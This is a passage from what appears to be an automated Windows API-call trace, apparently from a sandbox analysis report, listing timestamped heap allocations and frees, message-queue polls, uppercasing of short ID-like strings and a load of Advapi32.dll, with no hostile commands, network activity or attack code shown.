dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0256.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0256.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0256.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0256.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0256.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0256.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0256.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0256.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0256.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0256.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0256.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0256.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0256.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0256.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0256.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0256.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0256.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0256.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0256.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0256.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0256.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0256.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0256.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0256.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0256.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0256.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0256.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0256.380] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0256.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0256.381] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0256.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0256.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0256.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa278 [0256.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0256.381] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0256.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0256.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0256.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0256.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0256.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0256.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0256.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0256.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0256.381] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0256.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0256.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0256.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0256.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0256.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0256.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0256.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0256.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0256.382] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0256.382] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0256.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0256.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0256.382] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0256.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0256.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0256.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa008 [0256.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0256.382] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0256.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0256.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0256.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0256.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0256.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0256.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0256.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0256.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0256.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0256.383] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0256.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0256.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0256.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0256.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0256.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0256.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0256.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0256.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0256.383] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0256.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0256.384] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0256.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0256.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0256.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0256.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0256.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0256.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0256.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0256.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0256.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0256.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0256.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0256.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0256.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0256.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0256.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0256.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0256.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0256.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0256.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0256.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0256.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0256.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0256.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0256.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0256.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0256.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0256.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0256.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0256.385] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0256.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0256.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0256.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0256.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0256.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0256.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0256.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0256.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0256.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0256.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0256.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0256.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0256.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0256.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0256.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0256.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0256.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0256.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0256.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0256.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0256.388] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0256.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0256.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0256.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0256.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0256.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0256.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0256.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0256.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0256.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0256.389] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0256.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0256.389] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0256.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0256.389] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0256.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0256.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0256.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0256.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1948 [0256.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0256.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0256.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0256.389] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0256.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f78 [0256.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0256.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0256.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0256.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0256.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0256.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0256.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0256.390] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0256.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0256.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0256.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0256.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0256.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0256.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0256.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0256.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0256.390] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0256.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0256.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0256.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0256.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0256.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0256.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0256.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0256.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0256.391] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0256.391] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0256.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0256.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0256.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0256.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0256.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0256.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0256.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0256.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0256.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0256.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0256.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0256.392] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0256.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0256.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0256.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0256.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0256.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0256.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0256.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0256.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0256.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0256.392] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0256.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0256.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0256.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0256.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0256.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0256.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0256.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0256.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0256.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0256.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0256.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0256.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0256.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0256.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0256.393] HeapFree (in: hHeap=0x25c0000, 